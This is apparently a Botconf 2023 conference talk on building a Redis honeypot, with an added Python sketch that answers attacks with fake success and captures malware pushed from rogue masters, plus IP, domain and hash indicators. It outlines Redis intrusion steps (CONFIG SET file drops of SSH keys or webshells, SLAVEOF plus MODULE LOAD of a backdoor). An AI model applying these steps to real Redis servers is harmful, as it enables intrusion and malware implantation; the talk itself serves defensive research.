BOTCONF 2023 - @yarienkiva
Build your own Redis honeypot
whoami
- Aloïs "Alol" de Souza-Coroller
- @yarienkiva
- Malware Analyst @CERT La Poste
- HeroCTF organiser
- https://heartathack.club
HeroCTF
12 - 14 / 05
https://blog.aquasec.com/headcrab-attacks-servers-worldwide-with-novel-state-of-art-redis-malware
Redis
Open source, in-memory data store used by millions of developers as a database, cache, streaming engine, and message broker. "Designed to be totally insecure if exposed to the outside world." - antirez
Python
>>> pydict['key'] = 'value'
>>> pydict.get('key')
'value'
Redis
127.0.0.1:6379> set key value
OK
127.0.0.1:6379> get key
"value"
Serialization in Redis
*2\r\n$6\r\nHello,\r\n$11\r\nBotconf2023\r\n
*2          : number of words (array length)
$6          : length of the word that follows
Hello,      : the word itself
$11 / Botconf2023 : same for the second word
Decoded: Hello, Botconf2023
How to pwn a Redis
- Lua sandbox escape (or another Redis CVE)
- CONFIG SET dir + dbfilename, then SAVE a key holding an SSH key / webshell / crontab line so the dump lands in authorized_keys, the webroot or the cron spool
- SLAVEOF + MODULE LOAD (next slide)
SLAVEOF + MODULE LOAD
- SLAVEOF EVIL-IP : the target becomes a replica of the attacker's rogue master
- CONFIG SET dbfilename backdoor.so : the name the replica will write the synced "RDB" under
- REPLCONF / PSYNC : the rogue master answers FULLRESYNC and pushes the malicious .so as the RDB payload
- MODULE LOAD ./backdoor.so : Redis loads the attacker's shared object, code execution as the redis user
Inner workings
if attack:
    save_binary()
    return fake result
else:
    return redis result
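The pseudocode above and the RESP format from the serialization slide, worked into one runnable sketch. This is an added example, not the author's honeypot_redis code: the parser, the fake-result rules, the replica handshake towards the rogue master and the SHA-1 naming of saved samples are all my assumptions about how such a honeypot is built. The constants (port 6379, the /data dir, the 10 s timeout) are illustrative.

```python
"""Redis honeypot core (added example, not the author's honeypot_redis code): parse RESP, answer harmless
commands like Redis, fake success on SLAVEOF / CONFIG SET / MODULE LOAD and save the pushed backdoor .so."""
import hashlib
import socket


def encode_resp(args):
    """Serialise [b"SET", b"k", b"v"] as a RESP array of bulk strings."""
    return b"*%d\r\n" % len(args) + b"".join(b"$%d\r\n%s\r\n" % (len(a), a) for a in args)


def parse_resp(buf):
    """Parse one command from buf: (args, bytes_consumed), or (None, 0) if it is still incomplete."""
    end = buf.find(b"\r\n")
    if end < 0:
        return None, 0
    if buf[:1] != b"*":                           # inline form, e.g. typed into netcat
        return buf[:end].split(), end + 2
    count, pos, args = int(buf[1:end]), end + 2, []
    for _ in range(count):                        # *N elements, each a $len bulk string
        lend = buf.find(b"\r\n", pos)
        if buf[pos:pos + 1] != b"$" or lend < 0:
            return None, 0
        n, start = int(buf[pos + 1:lend]), lend + 2
        if len(buf) < start + n + 2:
            return None, 0
        args.append(buf[start:start + n])
        pos = start + n + 2
    return args, pos


def extract_sync_payload(reply):
    """Bytes a master pushes after "+FULLRESYNC <id> <off>\r\n$<n>\r\n", or None while incomplete."""
    start = reply.find(b"+FULLRESYNC")                # +PONG / +OK replies to the handshake precede it
    hdr = reply.find(b"\r\n", max(start, 0))
    lend = reply.find(b"\r\n", hdr + 2)
    if start < 0 or hdr < 0 or reply[hdr + 2:hdr + 3] != b"$" or lend < 0:
        return None
    n = int(reply[hdr + 3:lend])
    payload = reply[lend + 2:lend + 2 + n]
    return payload if len(payload) == n else None


class Honeypot:                                       # per-client state: toy store, fake config, attack log, samples
    def __init__(self):
        self.store, self.config = {}, {b"dir": b"/data", b"dbfilename": b"dump.rdb"}
        self.master, self.alerts, self.samples = None, [], {}

    def handle(self, args):
        """RESP reply for one parsed command: a real result, or a fake one for attack steps."""
        cmd = args[0].upper() if args else b""
        if cmd == b"SET" and len(args) >= 3:
            self.store[args[1]] = args[2]
            return b"+OK\r\n"
        if cmd == b"GET" and len(args) == 2:
            v = self.store.get(args[1])
            return b"$-1\r\n" if v is None else b"$%d\r\n%s\r\n" % (len(v), v)
        if cmd == b"CONFIG" and len(args) == 4 and args[1].upper() == b"SET":
            self.config[args[2].lower()] = args[3]      # dir / dbfilename: where the bot wants its file
            self.alerts.append(b" ".join(args))
            return b"+OK\r\n"
        if cmd in (b"SLAVEOF", b"REPLICAOF") and len(args) == 3 and args[2].isdigit():
            self.master = (args[1].decode(), int(args[2]))   # the attacker's rogue master
            self.alerts.append(b" ".join(args))
            return b"+OK\r\n"
        if cmd == b"MODULE" and len(args) >= 3 and args[1].upper() == b"LOAD":
            self.alerts.append(b" ".join(args))
            return b"+OK\r\n"                            # fake success so the bot runs its next stage
        return b"-ERR unknown command '%s'\r\n" % cmd

    def save_binary(self, payload):
        sha1 = hashlib.sha1(payload).hexdigest()        # samples keyed by SHA-1, the hash form of the IOC list
        self.samples[sha1] = payload
        return sha1

    def pull_from_master(self):
        """Pipelined replica handshake (PING, REPLCONF, PSYNC) with the rogue master; returns the sample's SHA-1."""
        with socket.create_connection(self.master, timeout=10) as s:
            for msg in ([b"PING"], [b"REPLCONF", b"listening-port", b"6379"], [b"PSYNC", b"?", b"-1"]):
                s.sendall(encode_resp(msg))
            reply = b""
            while (payload := extract_sync_payload(reply)) is None and (chunk := s.recv(65536)):
                reply += chunk
        return self.save_binary(payload) if payload is not None else None


def serve(port=6379):
    """Single-threaded listener: one Honeypot per client; a SLAVEOF triggers the pull from its master."""
    with socket.create_server(("0.0.0.0", port)) as srv:
        while True:
            conn, hp, buf = srv.accept()[0], Honeypot(), b""
            with conn:
                while chunk := conn.recv(4096):
                    buf += chunk
                    while (parsed := parse_resp(buf))[0] is not None:
                        args, buf = parsed[0], buf[parsed[1]:]
                        conn.sendall(hp.handle(args))
                        if hp.master and args and args[0].upper() in (b"SLAVEOF", b"REPLICAOF"):
                            print("sample", hp.pull_from_master(), "from", hp.master)
```

Call serve() on a throwaway VM and point redis-cli at it to see the fake replies. Nothing is ever executed: MODULE LOAD only returns +OK, and the pushed file lives in hp.samples under its SHA-1 (write it to disk in a real deployment). The listener is single-client and a dead rogue master raises OSError out of serve(), which is fine for a lab and should be wrapped for production.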
Results
The honeypot was pushed to prod this morning at 3AM so I haven't had the time to get any interesting results (or sleep), so ...
Free malware!
Results
Kiss-a-dog:
- Coinminer
- Tsunami (Backdoor)
- Backdoor SSH
- Diamorphine (Rootkit)
Watchdog:
- Coinminer
- SSH worm
IOCs
101.43.24.117
106.13.235.167
112.80.35.83
114.112.64.172
117.41.165.40
122.195.53.54
124.221.215.245
150.158.212.175
155.230.135.140
175.178.236.77
180.76.140.118
36.7.69.118
42.193.122.54
43.143.138.177
43.143.31.67
61.144.20.252
66.23.237.139
81.69.196.144
84.201.183.176
hxxp[://]s[.]na-cs[.]com/
hxxp[://]oracle[.]zzhreceive[.]top/
hxxp[://]kiss[.]a-dog[.]top
hxxp[://]45[.]83[.]123[.]29/
hxxp[://]en2an[.]top/
SHA-1:
c85a554b87aa138e54d646dadde08854dfc461bc
67e05c827ce3e92d394b1f750ab227f222aa505f
1e3f5965bedb8562ac13a487ce956983ecd7cf0c
Thanks for listening
@yarienkiva - Aloïs - CERT La Poste
La Poste recrute ;)
See you next year !
SHOUTBOX :
- HeroCTF V5 12-14/05
- LT done, plz don't fire me Christophe
- Fumiko plz post more music on twitter